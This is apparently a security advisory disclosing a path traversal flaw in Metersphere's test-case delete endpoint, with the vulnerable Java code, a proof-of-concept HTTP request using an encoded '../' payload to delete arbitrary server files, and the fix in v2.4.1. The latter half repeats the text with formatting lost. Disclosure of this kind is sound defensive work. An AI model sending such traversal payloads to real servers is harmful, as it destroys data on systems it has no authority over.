Summary
A Path Injection in ApiTestCaseService::deleteBodyFiles allows any authenticated user to delete arbitrary files on the server.
Details
Metersphere's ApiTestCaseController loads a /delete/{id} endpoint which takes a user-controlled string id and passes it to ApiTestCaseService's delete method.
// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/controller/definition/ApiTestCaseController.java#L127
@GetMapping("/delete/{id}")
...
public void delete(@PathVariable String id) {
apiTestCaseService.delete(id);
}
ApiTestCaseService's delete method passes the former id (now testId) to ApiTestCaseService's deleteBodyFiles.
// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L331
public void delete(String testId) {
...
deleteBodyFiles(testId);
...
}
Which uses the user-provided value (testId) in new File(BODY_FILE_DIR + "/" + testId), being deleted later by file.delete().
// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L365
public void deleteBodyFiles(String testId) {
File file = new File(BODY_FILE_DIR + "/" + testId);
FileUtil.deleteContents(file);
if (file.exists()) {
file.delete();
}
}
Proof of Concept
- Log in with an account (can be non-administrator)
- Create a file that the PoC will delete:
docker exec -it $(docker ps -q --filter "name=ms-server") touch /tmp/DELETE_ME
docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE_ME
- Send the following request replacing the
SESSION cookie and CSRF-TOKEN header:
GET /api/testcase/delete/..%2F..%2F..%2F..%2Ftmp%2FDELETE_ME HTTP/1.1
Host: 127.0.0.1:8081
CSRF-TOKEN: <CSRF-TOKEN>
Cookie: SESSION=<SESSION-COOKIE>
- Verify that the file was deleted:
docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE_ME
Patches
The vulnerability has been fixed in v2.4.1.
- b5b4c51: No longer can arbitrary files be deleted.
Workarounds
It is recommended to upgrade the version to v2.4.1.
For more information
If you have any questions or comments about this advisory, please open an issue.
Summary
A Path Injection in
ApiTestCaseService::deleteBodyFilesallows any authenticated user to delete arbitrary files on the server.Details
Metersphere's
ApiTestCaseControllerloads a/delete/{id}endpoint which takes a user-controlled stringidand passes it toApiTestCaseService'sdeletemethod.ApiTestCaseService'sdeletemethod passes the formerid(nowtestId) toApiTestCaseService'sdeleteBodyFiles.Which uses the user-provided value (
testId) innew File(BODY_FILE_DIR + "/" + testId), being deleted later byfile.delete().Proof of Concept
SESSIONcookie andCSRF-TOKENheader:Patches
The vulnerability has been fixed in v2.4.1.
Workarounds
It is recommended to upgrade the version to v2.4.1.
For more information
If you have any questions or comments about this advisory, please open an issue.